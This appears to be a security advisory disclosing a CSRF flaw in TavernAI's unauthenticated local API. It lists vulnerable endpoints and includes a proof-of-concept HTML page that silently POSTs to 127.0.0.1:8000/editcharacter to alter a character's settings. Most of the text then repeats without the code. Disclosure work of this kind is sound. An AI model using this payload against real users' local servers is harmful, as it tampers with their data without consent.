Summary
Some APIs can be called by CSRF attack due to lack of authentication function.
This can be prevented by adding a CORS setting, but some APIs are configured not to support Preflight, so even if CORS is configured, the problem cannot be resolved.
In this attack, requests are made from the user's PC to TavernAI, so the TavernAI server resolves the client address to the user's PC. so, whitelist is not working on this vulnerability.
Details
The following APIs are vulnerable to CSRF attacks per the Preflight specification.
- /editcharacter
- /createcharacter
- /deletecharacter
- /downloadbackground
- /importcharacter
- /importchat
For detailed specifications of Preflight, please refer to the following document: #MDN-CORS
PoC
<!DOCTYPE html>
<html>
<head>
<script src="https://code.jquery.com/jquery-3.6.3.min.js" integrity="sha256-pvPw+upLPUjgMXY0G+8O0xUf+/Im1MZjXxxgOcBQBXU=" crossorigin="anonymous"></script>
<script>
$(() => {
$("#btn").click(() => {
$.ajax({
type: 'POST',
url: "http://127.0.0.1:8000/editcharacter",
data: {"ch_name": "Aqua", "personality" : "CSRF", "avatar_url": "Aqua.png"},
});
});
});
</script>
</head>
<body>
<button type="button" id="btn">CSRF Attack</button>
</body>
</html>
The following html page arbitrarily changes the character settings of the character 'Aqua' when a button on the page is clicked.
Execution requires the following premises:
- TavernAI server must be open on port 8000
Impact
When a user accesses an arbitrary site, the attacker can call the vulnerable API by making an API call to localhost as shown in the code above.
However, the result of the call cannot be checked due to the CORS policy, and only API calls are possible.
Summary
Some APIs can be called by CSRF attack due to lack of authentication function.
This can be prevented by adding a CORS setting, but some APIs are configured not to support Preflight, so even if CORS is configured, the problem cannot be resolved.
In this attack, requests are made from the user's PC to TavernAI, so the TavernAI server resolves the client address to the user's PC. so, whitelist is not working on this vulnerability.
Details
The following APIs are vulnerable to CSRF attacks per the Preflight specification.
For detailed specifications of Preflight, please refer to the following document: #MDN-CORS
PoC
The following html page arbitrarily changes the character settings of the character 'Aqua' when a button on the page is clicked.
Execution requires the following premises:
Impact
When a user accesses an arbitrary site, the attacker can call the vulnerable API by making an API call to localhost as shown in the code above.
However, the result of the call cannot be checked due to the CORS policy, and only API calls are possible.